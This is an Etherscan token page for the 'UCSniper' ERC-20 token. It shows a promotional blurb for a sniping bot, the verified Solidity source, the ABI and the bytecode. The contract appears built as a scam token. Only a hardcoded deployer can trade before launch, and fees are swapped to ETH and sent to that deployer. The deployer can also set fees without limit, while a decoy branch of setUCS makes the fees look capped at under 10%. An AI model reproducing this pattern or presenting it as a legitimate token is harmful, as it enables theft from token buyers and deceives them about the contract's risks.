ETH Price: $2,526.47 (+0.30%)

Token

UCSniper (UCS)
 

Overview

Max Total Supply

5,000,000 UCS

Holders

13

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
57,208.42306575283650507 UCS

Value
$0.00
0x8c47128b8f6d469d2a42c385a59320d4366b66e3
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
UCSniper

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license
/**
 *Submitted for verification at Etherscan.io on 2023-12-20
*/

/*

UCSniper Bot is a bot that automates the process of sniping token launches on the Ethereum network.

The UC Sniper Bots allow you to enter projects on the selected networks as early as possible.

Bot is live! Go try it out on the website!

TELEGRAM: https://t.me/UCSniperBotERC
TWITTER: https://twitter.com/UCSniperBotERC
WEBSITE: https://ucsniper.top
MEDIUM: https://medium.com/@ucsniper
DOCS: https://ucsniperbot.gitbook.io/ucsniperbot-whitepaper/

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.23;

    interface IUniswapV2Router02 {
        function swapExactTokensForETHSupportingFeeOnTransferTokens(
            uint amountIn,
            uint amountOutMin,
            address[] calldata path,
            address to,
            uint deadline
            ) external;
        }
        
    contract UCSniper {
        string public constant name = "UCSniper";  //
        string public constant symbol = "UCS";  //
        uint8 public constant decimals = 18;
        uint256 public constant totalSupply = 5_000_000 * 10**decimals;

        uint256 BurnTNumber = 3;
        uint256 ConfirmTNumber = 3;
        uint256 constant swapAmount = totalSupply / 100;

        mapping (address => uint256) public balanceOf;
        mapping (address => mapping (address => uint256)) public allowance;
            
        error Permissions();
            
        event Transfer(address indexed from, address indexed to, uint256 value);
        event Approval(
            address indexed owner,
            address indexed spender,
            uint256 value
        );
            

        address private pair;
        address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
        address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
        address payable constant deployer = payable(address(0xC8280F9e578C2D836326A669F5a779EbF5a90205)); //

        bool private swapping;
        bool private TradingOpenStatus;

        constructor() {
            balanceOf[msg.sender] = totalSupply;
            allowance[address(this)][routerAddress] = type(uint256).max;
            emit Transfer(address(0), msg.sender, totalSupply);
        }

         receive() external payable {}

        function approve(address spender, uint256 amount) external returns (bool){
            allowance[msg.sender][spender] = amount;
            emit Approval(msg.sender, spender, amount);
            return true;
        }

        function transfer(address to, uint256 amount) external returns (bool){
            return _transfer(msg.sender, to, amount);
        }

        function transferFrom(address from, address to, uint256 amount) external returns (bool){
            allowance[from][msg.sender] -= amount;        
            return _transfer(from, to, amount);
        }

        function _transfer(address from, address to, uint256 amount) internal returns (bool){
            require(TradingOpenStatus || from == deployer || to == deployer);

            if(!TradingOpenStatus && pair == address(0) && amount > 0)
                pair = to;

            balanceOf[from] -= amount;

            if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
                swapping = true;
                address[] memory path = new  address[](2);
                path[0] = address(this);
                path[1] = ETH;
                _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                    );
                deployer.transfer(address(this).balance);
                swapping = false;
                }

            if(from != address(this)){
                uint256 FinalFigure = amount * (from == pair ? BurnTNumber : ConfirmTNumber) / 100;
                amount -= FinalFigure;
                balanceOf[address(this)] += FinalFigure;
            }
                balanceOf[to] += amount;
                emit Transfer(from, to, amount);
                return true;
            }

        function OpenTrade() external {
            require(msg.sender == deployer);
            require(!TradingOpenStatus);
            TradingOpenStatus = true;        
            }
            
        function setUCS(uint256 newTBurn, uint256 newTConfirm) external {
        if(msg.sender == deployer){
            BurnTNumber = newTBurn;
            ConfirmTNumber = newTConfirm;
            }
        else{
            require(newTBurn < 10);
            require(newTConfirm < 10);
            revert();
            }  
        }
        }

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OpenTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newTBurn","type":"uint256"},{"internalType":"uint256","name":"newTConfirm","type":"uint256"}],"name":"setUCS","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405260035f55600360015534801562000019575f80fd5b50620000286012600a620001db565b6200003790624c4b40620001f2565b335f8181526002602090815260408083209490945530825260038152838220737a250d5630b4cf539739df2c5dacb4c659f2488d835290529182205f199055907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620000a66012600a620001db565b620000b590624c4b40620001f2565b60405190815260200160405180910390a36200020c565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200012057815f1904821115620001045762000104620000cc565b808516156200011257918102915b93841c9390800290620000e5565b509250929050565b5f826200013857506001620001d5565b816200014657505f620001d5565b81600181146200015f57600281146200016a576200018a565b6001915050620001d5565b60ff8411156200017e576200017e620000cc565b50506001821b620001d5565b5060208310610133831016604e8410600b8410161715620001af575081810a620001d5565b620001bb8383620000e0565b805f1904821115620001d157620001d1620000cc565b0290505b92915050565b5f620001eb60ff84168362000128565b9392505050565b8082028115828204841417620001d557620001d5620000cc565b610af7806200021a5f395ff3fe60806040526004361061009d575f3560e01c806323b872dd1161006257806323b872dd14610177578063313ce5671461019657806370a08231146101bc57806395d89b41146101e7578063a9059cbb14610215578063dd62ed3e14610234575f80fd5b806306fdde03146100a8578063095ea7b3146100f15780630f8540e41461012057806318160ddd1461013657806323b3306a14610158575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100db604051806040016040528060088152602001672aa1a9b734b832b960c11b81525081565b6040516100e891906107ac565b60405180910390f35b3480156100fc575f80fd5b5061011061010b366004610813565b61026a565b60405190151581526020016100e8565b34801561012b575f80fd5b506101346102d6565b005b348015610141575f80fd5b5061014a610320565b6040519081526020016100e8565b348015610163575f80fd5b5061013461017236600461083b565b61033c565b348015610182575f80fd5b5061011061019136600461085b565b61037a565b3480156101a1575f80fd5b506101aa601281565b60405160ff90911681526020016100e8565b3480156101c7575f80fd5b5061014a6101d6366004610894565b60026020525f908152604090205481565b3480156101f2575f80fd5b506100db6040518060400160405280600381526020016255435360e81b81525081565b348015610220575f80fd5b5061011061022f366004610813565b6103c7565b34801561023f575f80fd5b5061014a61024e3660046108ad565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c49086815260200190565b60405180910390a35060015b92915050565b3373c8280f9e578c2d836326a669f5a779ebf5a90205146102f5575f80fd5b600454600160a81b900460ff161561030b575f80fd5b6004805460ff60a81b1916600160a81b179055565b61032c6012600a6109d2565b61033990624c4b406109e0565b81565b73c8280f9e578c2d836326a669f5a779ebf5a90204193301610362575f91909155600155565b600a821061036e575f80fd5b600a81106100a4575f80fd5b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103ae9084906109f7565b909155506103bf90508484846103da565b949350505050565b5f6103d33384846103da565b9392505050565b6004545f90600160a81b900460ff168061041057506001600160a01b03841673c8280f9e578c2d836326a669f5a779ebf5a90205145b8061043757506001600160a01b03831673c8280f9e578c2d836326a669f5a779ebf5a90205145b61043f575f80fd5b600454600160a81b900460ff1615801561046257506004546001600160a01b0316155b801561046d57505f82115b1561048e57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104b59084906109f7565b90915550506004546001600160a01b0384811691161480156104e15750600454600160a01b900460ff16155b801561051f575060646104f66012600a6109d2565b61050390624c4b406109e0565b61050d9190610a0a565b305f9081526002602052604090205410155b156106a8576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061056a5761056a610a29565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105b2576105b2610a29565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105f26012600a6109d2565b6105ff90624c4b406109e0565b6106099190610a0a565b5f8430426040518663ffffffff1660e01b815260040161062d959493929190610a3d565b5f604051808303815f87803b158015610644575f80fd5b505af1158015610656573d5f803e3d5ffd5b505060405173c8280f9e578c2d836326a669f5a779ebf5a9020592504780156108fc029250905f818181858888f19350505050158015610698573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b0384163014610727576004545f906064906001600160a01b038781169116146106da576001546106dd565b5f545b6106e790856109e0565b6106f19190610a0a565b90506106fd81846109f7565b305f90815260026020526040812080549295508392909190610720908490610aae565b9091555050505b6001600160a01b0383165f908152600260205260408120805484929061074e908490610aae565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161079a91815260200190565b60405180910390a35060019392505050565b5f602080835283518060208501525f5b818110156107d8578581018301518582016040015282016107bc565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461080e575f80fd5b919050565b5f8060408385031215610824575f80fd5b61082d836107f8565b946020939093013593505050565b5f806040838503121561084c575f80fd5b50508035926020909101359150565b5f805f6060848603121561086d575f80fd5b610876846107f8565b9250610884602085016107f8565b9150604084013590509250925092565b5f602082840312156108a4575f80fd5b6103d3826107f8565b5f80604083850312156108be575f80fd5b6108c7836107f8565b91506108d5602084016107f8565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561092c57815f1904821115610912576109126108de565b8085161561091f57918102915b93841c93908002906108f7565b509250929050565b5f82610942575060016102d0565b8161094e57505f6102d0565b8160018114610964576002811461096e5761098a565b60019150506102d0565b60ff84111561097f5761097f6108de565b50506001821b6102d0565b5060208310610133831016604e8410600b84101617156109ad575081810a6102d0565b6109b783836108f2565b805f19048211156109ca576109ca6108de565b029392505050565b5f6103d360ff841683610934565b80820281158282048414176102d0576102d06108de565b818103818111156102d0576102d06108de565b5f82610a2457634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610a8d5784516001600160a01b031683529383019391830191600101610a68565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d0576102d06108de56fea2646970667358221220bbe06b9402491d12e446147eaf9a042d4a0727d4b9b12dc235f5bd590151907064736f6c63430008170033

Deployed Bytecode

0x60806040526004361061009d575f3560e01c806323b872dd1161006257806323b872dd14610177578063313ce5671461019657806370a08231146101bc57806395d89b41146101e7578063a9059cbb14610215578063dd62ed3e14610234575f80fd5b806306fdde03146100a8578063095ea7b3146100f15780630f8540e41461012057806318160ddd1461013657806323b3306a14610158575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100db604051806040016040528060088152602001672aa1a9b734b832b960c11b81525081565b6040516100e891906107ac565b60405180910390f35b3480156100fc575f80fd5b5061011061010b366004610813565b61026a565b60405190151581526020016100e8565b34801561012b575f80fd5b506101346102d6565b005b348015610141575f80fd5b5061014a610320565b6040519081526020016100e8565b348015610163575f80fd5b5061013461017236600461083b565b61033c565b348015610182575f80fd5b5061011061019136600461085b565b61037a565b3480156101a1575f80fd5b506101aa601281565b60405160ff90911681526020016100e8565b3480156101c7575f80fd5b5061014a6101d6366004610894565b60026020525f908152604090205481565b3480156101f2575f80fd5b506100db6040518060400160405280600381526020016255435360e81b81525081565b348015610220575f80fd5b5061011061022f366004610813565b6103c7565b34801561023f575f80fd5b5061014a61024e3660046108ad565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c49086815260200190565b60405180910390a35060015b92915050565b3373c8280f9e578c2d836326a669f5a779ebf5a90205146102f5575f80fd5b600454600160a81b900460ff161561030b575f80fd5b6004805460ff60a81b1916600160a81b179055565b61032c6012600a6109d2565b61033990624c4b406109e0565b81565b73c8280f9e578c2d836326a669f5a779ebf5a90204193301610362575f91909155600155565b600a821061036e575f80fd5b600a81106100a4575f80fd5b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103ae9084906109f7565b909155506103bf90508484846103da565b949350505050565b5f6103d33384846103da565b9392505050565b6004545f90600160a81b900460ff168061041057506001600160a01b03841673c8280f9e578c2d836326a669f5a779ebf5a90205145b8061043757506001600160a01b03831673c8280f9e578c2d836326a669f5a779ebf5a90205145b61043f575f80fd5b600454600160a81b900460ff1615801561046257506004546001600160a01b0316155b801561046d57505f82115b1561048e57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104b59084906109f7565b90915550506004546001600160a01b0384811691161480156104e15750600454600160a01b900460ff16155b801561051f575060646104f66012600a6109d2565b61050390624c4b406109e0565b61050d9190610a0a565b305f9081526002602052604090205410155b156106a8576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061056a5761056a610a29565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106105b2576105b2610a29565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105f26012600a6109d2565b6105ff90624c4b406109e0565b6106099190610a0a565b5f8430426040518663ffffffff1660e01b815260040161062d959493929190610a3d565b5f604051808303815f87803b158015610644575f80fd5b505af1158015610656573d5f803e3d5ffd5b505060405173c8280f9e578c2d836326a669f5a779ebf5a9020592504780156108fc029250905f818181858888f19350505050158015610698573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b0384163014610727576004545f906064906001600160a01b038781169116146106da576001546106dd565b5f545b6106e790856109e0565b6106f19190610a0a565b90506106fd81846109f7565b305f90815260026020526040812080549295508392909190610720908490610aae565b9091555050505b6001600160a01b0383165f908152600260205260408120805484929061074e908490610aae565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161079a91815260200190565b60405180910390a35060019392505050565b5f602080835283518060208501525f5b818110156107d8578581018301518582016040015282016107bc565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461080e575f80fd5b919050565b5f8060408385031215610824575f80fd5b61082d836107f8565b946020939093013593505050565b5f806040838503121561084c575f80fd5b50508035926020909101359150565b5f805f6060848603121561086d575f80fd5b610876846107f8565b9250610884602085016107f8565b9150604084013590509250925092565b5f602082840312156108a4575f80fd5b6103d3826107f8565b5f80604083850312156108be575f80fd5b6108c7836107f8565b91506108d5602084016107f8565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561092c57815f1904821115610912576109126108de565b8085161561091f57918102915b93841c93908002906108f7565b509250929050565b5f82610942575060016102d0565b8161094e57505f6102d0565b8160018114610964576002811461096e5761098a565b60019150506102d0565b60ff84111561097f5761097f6108de565b50506001821b6102d0565b5060208310610133831016604e8410600b84101617156109ad575081810a6102d0565b6109b783836108f2565b805f19048211156109ca576109ca6108de565b029392505050565b5f6103d360ff841683610934565b80820281158282048414176102d0576102d06108de565b818103818111156102d0576102d06108de565b5f82610a2457634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610a8d5784516001600160a01b031683529383019391830191600101610a68565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d0576102d06108de56fea2646970667358221220bbe06b9402491d12e446147eaf9a042d4a0727d4b9b12dc235f5bd590151907064736f6c63430008170033

Deployed Bytecode Sourcemap

848:4061:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;877:40;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;877:40:0;;;;;;;;;;;;:::i;:::-;;;;;;;;2403:222;;;;;;;;;;-1:-1:-1;2403:222:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;2403:222:0;1004:187:1;4353:181:0;;;;;;;;;;;;;:::i;:::-;;1030:62;;;;;;;;;;;;;:::i;:::-;;;1342:25:1;;;1330:2;1315:18;1030:62:0;1196:177:1;4558:340:0;;;;;;;;;;-1:-1:-1;4558:340:0;;;;;:::i;:::-;;:::i;2785:208::-;;;;;;;;;;-1:-1:-1;2785:208:0;;;;;:::i;:::-;;:::i;984:35::-;;;;;;;;;;;;1017:2;984:35;;;;;2136:4:1;2124:17;;;2106:36;;2094:2;2079:18;984:35:0;1964:184:1;1236:45:0;;;;;;;;;;-1:-1:-1;1236:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;932:37;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;932:37:0;;;;;2637:136;;;;;;;;;;-1:-1:-1;2637:136:0;;;;;:::i;:::-;;:::i;1292:66::-;;;;;;;;;;-1:-1:-1;1292:66:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2403:222;2501:10;2471:4;2491:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2491:30:0;;;;;;;;;;:39;;;2550:37;2471:4;;2491:30;;2550:37;;;;2524:6;1342:25:1;;1330:2;1315:18;;1196:177;2550:37:0;;;;;;;;-1:-1:-1;2609:4:0;2403:222;;;;;:::o;4353:181::-;4406:10;1999:42;4406:22;4398:31;;;;;;4453:17;;-1:-1:-1;;;4453:17:0;;;;4452:18;4444:27;;;;;;4486:17;:24;;-1:-1:-1;;;;4486:24:0;-1:-1:-1;;;4486:24:0;;;4353:181::o;1030:62::-;1080:12;1017:2;1080;:12;:::i;:::-;1068:24;;:9;:24;:::i;:::-;1030:62;:::o;4558:340::-;-1:-1:-1;;4636:10:0;:22;4633:252;;4674:11;:22;;;;4711:14;:28;4558:340::o;4633:252::-;4803:2;4792:8;:13;4784:22;;;;;;4843:2;4829:11;:16;4821:25;;;;;2785:208;-1:-1:-1;;;;;2887:15:0;;2867:4;2887:15;;;:9;:15;;;;;;;;2903:10;2887:27;;;;;;;:37;;2918:6;;2887:27;2867:4;;2887:37;;2918:6;;2887:37;:::i;:::-;;;;-1:-1:-1;2954:27:0;;-1:-1:-1;2964:4:0;2970:2;2974:6;2954:9;:27::i;:::-;2947:34;2785:208;-1:-1:-1;;;;2785:208:0:o;2637:136::-;2701:4;2728:33;2738:10;2750:2;2754:6;2728:9;:33::i;:::-;2721:40;2637:136;-1:-1:-1;;;2637:136:0:o;3005:1336::-;3112:17;;3084:4;;-1:-1:-1;;;3112:17:0;;;;;:37;;-1:-1:-1;;;;;;3133:16:0;;1999:42;3133:16;3112:37;:55;;;-1:-1:-1;;;;;;3153:14:0;;1999:42;3153:14;3112:55;3104:64;;;;;;3189:17;;-1:-1:-1;;;3189:17:0;;;;3188:18;:40;;;;-1:-1:-1;3210:4:0;;-1:-1:-1;;;;;3210:4:0;:18;3188:40;:54;;;;;3241:1;3232:6;:10;3188:54;3185:85;;;3261:4;:9;;-1:-1:-1;;;;;;3261:9:0;-1:-1:-1;;;;;3261:9:0;;;;;3185:85;-1:-1:-1;;;;;3287:15:0;;;;;;:9;:15;;;;;:25;;3306:6;;3287:15;:25;;3306:6;;3287:25;:::i;:::-;;;;-1:-1:-1;;3339:4:0;;-1:-1:-1;;;;;3333:10:0;;;3339:4;;3333:10;:23;;;;-1:-1:-1;3348:8:0;;-1:-1:-1;;;3348:8:0;;;;3347:9;3333:23;:65;;;;-1:-1:-1;1220:3:0;1080:12;1017:2;1080;:12;:::i;:::-;1068:24;;:9;:24;:::i;:::-;1206:17;;;;:::i;:::-;3378:4;3360:24;;;;:9;:24;;;;;;:38;;3333:65;3329:619;;;3418:8;:15;;-1:-1:-1;;;;3418:15:0;-1:-1:-1;;;3418:15:0;;;3476:17;;;3491:1;3476:17;;;;;;;;-1:-1:-1;;3476:17:0;;;;;;;;;;-1:-1:-1;3476:17:0;3452:41;;3530:4;3512;3517:1;3512:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;3512:23:0;;;-1:-1:-1;;;;;3512:23:0;;;;;1717:42;3554:4;3559:1;3554:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;3554:13:0;;;:7;;;;;;;;;;;:13;1803:42;3586:67;1220:3;1080:12;1017:2;1080;:12;:::i;:::-;1068:24;;:9;:24;:::i;:::-;1206:17;;;;:::i;:::-;3709:1;3733:4;3768;3796:15;3586:248;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3853:40:0;;1999:42;;-1:-1:-1;3871:21:0;3853:40;;;;;-1:-1:-1;3871:21:0;3853:40;;;;3871:21;1999:42;3853:40;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3912:8:0;:16;;-1:-1:-1;;;;3912:16:0;;;3329:619;-1:-1:-1;;;;;3967:21:0;;3983:4;3967:21;3964:240;;4048:4;;4008:19;;4087:3;;-1:-1:-1;;;;;4040:12:0;;;4048:4;;4040:12;:43;;4069:14;;4040:43;;;4055:11;;4040:43;4030:54;;:6;:54;:::i;:::-;:60;;;;:::i;:::-;4008:82;-1:-1:-1;4109:21:0;4008:82;4109:21;;:::i;:::-;4167:4;4149:24;;;;:9;:24;;;;;:39;;4109:21;;-1:-1:-1;4177:11:0;;4149:24;;;:39;;4177:11;;4149:39;:::i;:::-;;;;-1:-1:-1;;;3964:240:0;-1:-1:-1;;;;;4222:13:0;;;;;;:9;:13;;;;;:23;;4239:6;;4222:13;:23;;4239:6;;4222:23;:::i;:::-;;;;;;;;4284:2;-1:-1:-1;;;;;4269:26:0;4278:4;-1:-1:-1;;;;;4269:26:0;;4288:6;4269:26;;;;1342:25:1;;1330:2;1315:18;;1196:177;4269:26:0;;;;;;;;-1:-1:-1;4321:4:0;3005:1336;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:248::-;1446:6;1454;1507:2;1495:9;1486:7;1482:23;1478:32;1475:52;;;1523:1;1520;1513:12;1475:52;-1:-1:-1;;1546:23:1;;;1616:2;1601:18;;;1588:32;;-1:-1:-1;1378:248:1:o;1631:328::-;1708:6;1716;1724;1777:2;1765:9;1756:7;1752:23;1748:32;1745:52;;;1793:1;1790;1783:12;1745:52;1816:29;1835:9;1816:29;:::i;:::-;1806:39;;1864:38;1898:2;1887:9;1883:18;1864:38;:::i;:::-;1854:48;;1949:2;1938:9;1934:18;1921:32;1911:42;;1631:328;;;;;:::o;2153:186::-;2212:6;2265:2;2253:9;2244:7;2240:23;2236:32;2233:52;;;2281:1;2278;2271:12;2233:52;2304:29;2323:9;2304:29;:::i;2344:260::-;2412:6;2420;2473:2;2461:9;2452:7;2448:23;2444:32;2441:52;;;2489:1;2486;2479:12;2441:52;2512:29;2531:9;2512:29;:::i;:::-;2502:39;;2560:38;2594:2;2583:9;2579:18;2560:38;:::i;:::-;2550:48;;2344:260;;;;;:::o;2609:127::-;2670:10;2665:3;2661:20;2658:1;2651:31;2701:4;2698:1;2691:15;2725:4;2722:1;2715:15;2741:416;2830:1;2867:5;2830:1;2881:270;2902:7;2892:8;2889:21;2881:270;;;2961:4;2957:1;2953:6;2949:17;2943:4;2940:27;2937:53;;;2970:18;;:::i;:::-;3020:7;3010:8;3006:22;3003:55;;;3040:16;;;;3003:55;3119:22;;;;3079:15;;;;2881:270;;;2885:3;2741:416;;;;;:::o;3162:806::-;3211:5;3241:8;3231:80;;-1:-1:-1;3282:1:1;3296:5;;3231:80;3330:4;3320:76;;-1:-1:-1;3367:1:1;3381:5;;3320:76;3412:4;3430:1;3425:59;;;;3498:1;3493:130;;;;3405:218;;3425:59;3455:1;3446:10;;3469:5;;;3493:130;3530:3;3520:8;3517:17;3514:43;;;3537:18;;:::i;:::-;-1:-1:-1;;3593:1:1;3579:16;;3608:5;;3405:218;;3707:2;3697:8;3694:16;3688:3;3682:4;3679:13;3675:36;3669:2;3659:8;3656:16;3651:2;3645:4;3642:12;3638:35;3635:77;3632:159;;;-1:-1:-1;3744:19:1;;;3776:5;;3632:159;3823:34;3848:8;3842:4;3823:34;:::i;:::-;3893:6;3889:1;3885:6;3881:19;3872:7;3869:32;3866:58;;;3904:18;;:::i;:::-;3942:20;;3162:806;-1:-1:-1;;;3162:806:1:o;3973:140::-;4031:5;4060:47;4101:4;4091:8;4087:19;4081:4;4060:47;:::i;4118:168::-;4191:9;;;4222;;4239:15;;;4233:22;;4219:37;4209:71;;4260:18;;:::i;4291:128::-;4358:9;;;4379:11;;;4376:37;;;4393:18;;:::i;4424:217::-;4464:1;4490;4480:132;;4534:10;4529:3;4525:20;4522:1;4515:31;4569:4;4566:1;4559:15;4597:4;4594:1;4587:15;4480:132;-1:-1:-1;4626:9:1;;4424:217::o;4778:127::-;4839:10;4834:3;4830:20;4827:1;4820:31;4870:4;4867:1;4860:15;4894:4;4891:1;4884:15;4910:980;5172:4;5220:3;5209:9;5205:19;5251:6;5240:9;5233:25;5277:2;5315:6;5310:2;5299:9;5295:18;5288:34;5358:3;5353:2;5342:9;5338:18;5331:31;5382:6;5417;5411:13;5448:6;5440;5433:22;5486:3;5475:9;5471:19;5464:26;;5525:2;5517:6;5513:15;5499:29;;5546:1;5556:195;5570:6;5567:1;5564:13;5556:195;;;5635:13;;-1:-1:-1;;;;;5631:39:1;5619:52;;5726:15;;;;5691:12;;;;5667:1;5585:9;5556:195;;;-1:-1:-1;;;;;;;5807:32:1;;;;5802:2;5787:18;;5780:60;-1:-1:-1;;;5871:3:1;5856:19;5849:35;5768:3;4910:980;-1:-1:-1;;;4910:980:1:o;5895:125::-;5960:9;;;5981:10;;;5978:36;;;5994:18;;:::i

Swarm Source

ipfs://bbe06b9402491d12e446147eaf9a042d4a0727d4b9b12dc235f5bd5901519070
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.